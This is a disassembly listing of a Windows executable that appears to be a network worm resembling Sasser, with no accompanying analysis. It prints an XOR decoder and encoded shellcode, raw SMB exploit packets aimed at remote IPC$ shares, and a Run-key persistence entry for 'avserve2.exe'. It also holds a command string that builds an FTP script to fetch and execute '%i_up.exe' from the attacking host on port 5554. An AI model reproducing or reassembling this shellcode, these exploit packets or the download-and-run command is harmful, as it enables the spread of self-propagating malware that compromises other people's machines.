dd 77E61BE6h, 77E6E4C8h, 77E99331h, 77E7A099h, 77E7AC37h
dd 77E684C6h, 77F5157Dh, 77E7751Ah, 77E7C2C4h, 77E6BD13h
dd 77E705B0h, 77E7A5FDh, 77F5722Fh, 77E7980Ah, 77F516F8h
dd 77E6C703h, 77E7A13Fh, 77E7849Fh, 77E7C866h, 77E641EBh
dd 77E77CCEh, 77E79D8Ch, 77F6183Eh, 77F51597h, 77E79E34h
dd 77E7C726h, 77E76E0Bh, 77E78406h, 77E781F9h, 77E77405h
dd 77E79F93h, 77E6177Ah, 77E7C938h, 77E7C486h, 77E75CB5h
dd 77E616B4h, 77E79C90h, 77EB9A84h, 77E9C5B1h, 77E7C9E1h
dd 77E79924h, 77E67702h, 77E77EE1h, 77E7C931h, 77E79C3Dh
dd 0
dd 77D4C96Ah, 0
dd 71AB868Dh, 71AB5690h, 71AB1AF4h, 71AB1746h, 71AB3C22h
dd 71AB3E5Dh, 71AB5DE2h, 71AB32CAh, 71AB401Ch, 71AB12F8h
dd 71AB2BBFh, 71AB41DAh, 71AB3ECEh, 71AB1A6Dh, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread_0 db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 ; DATA XREF: sub_402AC1+1F�o
dword_406004 dd 0 ; DATA XREF: sub_402AC1+1A�o
dword_406008 dd 0 ; DATA XREF: sub_402AC1+10�o
dd offset sub_403C6B
dword_406010 dd 0 ; DATA XREF: sub_402AC1:loc_402ACC�o
dword_406014 dd 0 ; DATA XREF: sub_402B10+65�o
dword_406018 dd 0 ; DATA XREF: sub_402B10:loc_402B70�o
dword_40601C dd 0 ; DATA XREF: sub_402B10+76�o
dword_406020 dd 4 dup(0) ; DATA XREF: sub_402B10:loc_402B81�o
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 ; DATA XREF: sub_40159E+47E�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; DATA XREF: sub_40159E+16B�r
; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fh ; DATA XREF: .text:off_4068E4�o
dword_4068F0 dd 20303032h, 0A4B4Fh ; DATA XREF: .text:off_4068E0�o
dword_4068F8 dd 20363232h, 0A4B4Fh ; DATA XREF: .text:off_4068DC�o
dword_406900 dd 20303332h, 0A4B4Fh ; DATA XREF: .text:off_4068D8�o
dword_406908 dd 20313333h, 0A4B4Fh ; DATA XREF: .text:off_4068D4�o
dword_406910 dd 20303232h, 0A4B4Fh ; DATA XREF: .text:off_4068D0�o
aAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 ; DATA XREF: sub_40159E+1CC�o
dword_406A34 dd 1CEC8166h ; DATA XREF: sub_40159E+D�r
dword_406A38 dd 0E4FF07h ; DATA XREF: sub_40159E+18�r
dword_406A3C dd 302E35h ; DATA XREF: sub_401A84+4A�o
dword_406A40 dd 312E35h ; DATA XREF: sub_401A84+27�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; DATA XREF: sub_403590+E�r
; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 ; DATA XREF: sub_402810�r
dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; DATA XREF: sub_402D04+A�r
; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 ; DATA XREF: sub_402BC3+58�r
dword_406D74 dd 7 ; DATA XREF: sub_402BC3+5E�r
dword_406D78 dd 0Ah ; DATA XREF: sub_402D04+4�r
dword_406D7C dd 8Ch ; DATA XREF: sub_402BC3+82�r
; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; DATA XREF: .text:0040348F�o
; sub_403496+2�o
dword_406DA0 dd 2 ; DATA XREF: sub_4035C9+E�o
; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h ; DATA XREF: sub_4038A7+2F�o
dword_406E3C dd 82798260h, 21h, 0 ; DATA XREF: sub_4038A7+11D�r
dword_406E48 dd 0DFA6h ; DATA XREF: sub_4038A7+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; DATA XREF: sub_4038A7+3C�o
; sub_403CF4+5�r
align 10h
dword_406F30 dd 41E0921h ; DATA XREF: sub_401000�r
; sub_401000+10�w ...
dword_406F34 dd 0 ; DATA XREF: sub_401210+6�w
; sub_401210+D�r
dword_406F38 dd 0 ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; DATA XREF: sub_402680+3B�r
; sub_402680+91�w
dword_406F40 dd 0 ; DATA XREF: sub_40283E+84�w
; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 ; DATA XREF: sub_402934�r sub_402959�r ...
dd 3 dup(0)
dword_406F58 dd 0A28h ; DATA XREF: sub_40283E+52�w
dword_406F5C dd 501h ; DATA XREF: sub_40283E+49�w
dword_406F60 dd 5 ; DATA XREF: sub_40283E+3E�w
dword_406F64 dd 1 ; DATA XREF: sub_40283E+30�w
dword_406F68 dd 1 ; DATA XREF: sub_402E58+91�w
dword_406F6C dd 0CB0B00h ; DATA XREF: sub_402E58+89�w
dd 0
dword_406F74 dd 0CB0A80h ; DATA XREF: sub_402D9F+44�w
dd 3 dup(0)
off_406F84 dd offset aCM_unpackerPac ; DATA XREF: sub_402E58+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 ; DATA XREF: sub_402B10+27�w
dword_406F94 dd 0 ; DATA XREF: sub_402B10+4�r
; sub_402B10+8B�w
dword_406F98 dd 0 ; DATA XREF: sub_402BC3+3A�r
; sub_402BC3+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
align 4
dd 31h dup(0)
dword_40707C dd 9 dup(0) ; DATA XREF: .text:00406624�o
; .text:00406638�o ...
dword_4070A0 dd 1 ; DATA XREF: sub_4030A5+2�r
; sub_4030A5+23�w ...
dword_4070A4 dd 0 ; DATA XREF: sub_403590+21�r
dword_4070A8 dd 1 ; DATA XREF: sub_40371C+26�r
; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; DATA XREF: sub_4038A7:loc_403A22�r
; sub_403A40+4�w ...
dword_4070B0 dd 0 ; DATA XREF: sub_404573+3�r
; sub_404573+2E�w ...
dword_4070B4 dd 0 ; DATA XREF: sub_404573+43�w
; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; DATA XREF: sub_404573+4A�w
; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 ; DATA XREF: sub_40371C+7B�r
dd 3 dup(0)
dword_4070D4 dd 0 ; DATA XREF: sub_40371C+A6�r
; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; DATA XREF: sub_4046FE+28�r
; sub_4046FE+4C�w ...
dword_4070E0 dd 0 ; DATA XREF: sub_403CB6�r
dword_4070E4 dd 0 ; DATA XREF: sub_40494D�r
dword_4070E8 dd 10h ; DATA XREF: sub_403D2A+32�w
; sub_4043C7+5�r ...
dword_4070EC dd 0 ; DATA XREF: sub_403D93+239�r
; sub_403D93+259�r ...
dword_4070F0 dd 320650h ; DATA XREF: sub_403D2A+2D�w
; sub_403D93+310�w ...
dword_4070F4 dd 0 ; DATA XREF: sub_403D2A:loc_403D47�w
; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; DATA XREF: sub_403D2A+24�w
; sub_403D68�r ...
dword_4070FC dd 320650h ; DATA XREF: sub_403D2A+15�w
; sub_403D68+8�r ...
dword_407100 dd 4E4h ; DATA XREF: sub_4038A7+14�r
; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; DATA XREF: sub_4038A7+123�o
; sub_4038A7+171�o ...
dword_40711C dd 0 ; DATA XREF: sub_4038A7+108�w
; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407324 dd 0 ; DATA XREF: sub_4038A7+6E�w
; sub_4038A7+12B�w ...
dword_407328 dd 320000h ; DATA XREF: sub_403382+19�w
; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 0CB0EF0h ; DATA XREF: sub_4031D7:loc_4031F7�w
; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) ; DATA XREF: sub_4031D7+92�o
dword_407440 dd 20h ; DATA XREF: sub_4031D7+26�w
; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 ; DATA XREF: sub_402D9F+AD�w
dword_407448 dd 1 ; DATA XREF: sub_402D47�r sub_402D9F+3�r ...
dword_40744C dd 0 ; DATA XREF: sub_402B10+3E�r
dword_407450 dd 0 ; DATA XREF: sub_402B10+35�r
; sub_402B10+57�r
dword_407454 dd 0 ; DATA XREF: sub_402AC1�r
dword_407458 dd 452340h ; DATA XREF: sub_40283E+7A�w
; sub_402D47+F�r ...
dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41A000h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_43FC77
popa
jmp sub_40283E
start endp
; ---------------------------------------------------------------------------
db 0
byte_41A00D db 0D8h, 74h, 90h ; DATA XREF: .bss:off_44A610�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0B930DA00h, 0E300B790h, 4DEB245Fh, 1F4A7757h
dd 52E6F8B6h, 0E836A8C1h, 0F1C27694h, 0ECD1E6BCh, 88E8E802h
dd 47B2E7DAh, 0FAF051FAh, 0C0E8A6F0h, 4E964151h, 4EF7EA44h
dd 1443FC9Fh, 0E569903Fh, 0A61BCCh, 6014C00h, 0D21F7300h
dd 45h, 0
dd 0E00E000h, 2010B21h, 0AE0037h, 340000h, 5C0000h, 119600h
dd 100000h, 0C00000h, 0
dd 100010h, 20000h, 100h, 0
dd 400h, 0
dd 1800000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 1700000h, 4C00h, 1400000h, 1CC00h, 6 dup(0)
dd 1500000h, 141000h, 14h dup(0)
dd 65742E00h, 7478h, 0AD4000h, 100000h, 0AD4000h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 5BD800h, 0C00000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 19A000h, 1200000h, 19A000h
dd 0B20000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 1CC00h, 1400000h, 1CC00h
dd 0CC0000h, 3 dup(0)
dd 6000h, 65722EC0h, 636F6Ch, 141800h, 1500000h, 141800h
dd 0D00000h, 3 dup(0)
dd 2000h, 64652E02h, 617461h, 4C00h, 1700000h, 4C00h, 0E60000h
dd 3 dup(0)
dd 2000h, 40h, 65h dup(0)
dd 1B800h, 31C30000h, 4C8B40C0h, 41F70424h, 604h, 8B0F7400h
dd 8B082444h, 89102454h, 3B802h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_41A433 proc near ; CODE XREF: .data:0041A55B�p
; .data:0041A589�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001006h
push large dword ptr fs:0
mov large fs:0, esp
loc_41A450: ; CODE XREF: sub_41A433+44�j
; sub_41A433+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41A47F
cmp esi, [esp+1Ch+arg_4]
jz short loc_41A47F
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41A450
call dword ptr [ebx+esi*4+8]
jmp short loc_41A450
; ---------------------------------------------------------------------------
